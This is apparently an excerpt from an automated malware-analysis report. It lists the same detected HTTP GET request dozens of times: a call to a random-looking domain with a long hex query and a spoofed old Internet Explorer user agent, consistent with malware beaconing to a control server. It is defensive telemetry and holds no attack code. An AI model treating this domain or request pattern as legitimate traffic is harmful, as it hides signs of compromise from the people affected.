        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
